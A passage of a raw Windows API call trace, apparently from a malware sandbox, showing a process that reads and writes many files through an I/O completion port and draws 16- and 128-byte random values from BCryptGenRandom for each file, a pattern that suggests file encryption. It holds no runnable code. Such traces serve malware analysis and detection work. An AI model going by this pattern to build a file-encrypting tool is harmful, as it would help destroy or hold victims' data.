CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.479] CloseHandle (hObject=0x13c0) returned 1 [0109.480] free (_Block=0x1ff1e60) [0109.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.480] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0109.480] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.495] WriteFile (in: hFile=0x2f4, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.548] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.548] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.569] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xdc4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0109.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.582] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x9b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0109.582] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.599] ReadFile (in: hFile=0x3ac, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x68c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.599] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.611] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.611] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.612] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.612] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.612] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.612] free (_Block=0x77d800) [0109.613] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.613] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.613] free (_Block=0x1fa4848) [0109.613] free (_Block=0x2071818) [0109.613] free (_Block=0x77d908) [0109.613] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.625] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.626] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.626] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.626] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.627] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.627] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.627] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.627] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.627] free (_Block=0x77d800) [0109.627] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.627] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.628] free (_Block=0x1fa4848) [0109.628] free (_Block=0x2071818) [0109.628] free (_Block=0x77d908) [0109.628] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0109.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.639] CloseHandle (hObject=0x2f4) returned 1 [0109.645] free (_Block=0x1ff1e60) [0109.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.655] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x984, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0109.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.665] ReadFile (in: hFile=0x3ac, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0xaac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.665] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.678] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.678] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.678] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.678] free (_Block=0x77d800) [0109.678] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.678] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.678] free (_Block=0x1fa4848) [0109.678] free (_Block=0x2071818) [0109.678] free (_Block=0x77d908) [0109.678] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.721] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0109.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.738] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.738] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.738] free (_Block=0x77d800) [0109.738] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.738] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.739] free (_Block=0x1fa4848) [0109.739] free (_Block=0x2071818) [0109.739] free (_Block=0x77d908) [0109.739] WriteFile (in: hFile=0x3ac, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.749] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.750] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.772] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xf6c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0109.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.801] CloseHandle (hObject=0x3bc) returned 1 [0109.806] free (_Block=0x3d70048) [0109.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.814] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0109.814] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.835] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x246a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.844] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.850] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xdec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0109.850] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.862] CloseHandle (hObject=0x3bc) returned 1 [0109.862] free (_Block=0x3d70048) [0109.862] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.899] WriteFile (in: hFile=0x81c, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0109.899] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.912] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8d6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.913] CloseHandle (hObject=0x3ac) returned 1 [0109.916] free (_Block=0x1ff1e60) [0109.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.929] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.929] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.930] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.930] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.930] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.930] free (_Block=0x77d800) [0109.930] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.930] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.931] free (_Block=0x1fa4848) [0109.931] free (_Block=0x2071818) [0109.931] free (_Block=0x77d908) [0109.931] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.931] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.932] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.948] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1b3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.949] CloseHandle (hObject=0x3ac) returned 1 [0109.953] free (_Block=0x1ff1e60) [0109.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.963] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0109.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0109.964] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0109.964] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0109.964] free (_Block=0x77d800) [0109.964] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0109.964] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0109.965] free (_Block=0x1fa4848) [0109.965] free (_Block=0x2071818) [0109.965] free (_Block=0x77d908) [0109.965] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.966] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.980] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc18a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.995] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xb96, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.996] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0109.996] CloseHandle (hObject=0x3ac) returned 1 [0109.997] free (_Block=0x1ff1e60) [0109.997] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0110.010] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0110.011] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0110.011] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0110.011] free (_Block=0x77d800) [0110.011] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0110.011] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0110.011] free (_Block=0x1fa4848) [0110.011] free (_Block=0x2071818) [0110.011] free (_Block=0x77d908) [0110.011] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.012] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.013] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.013] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0110.033] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, 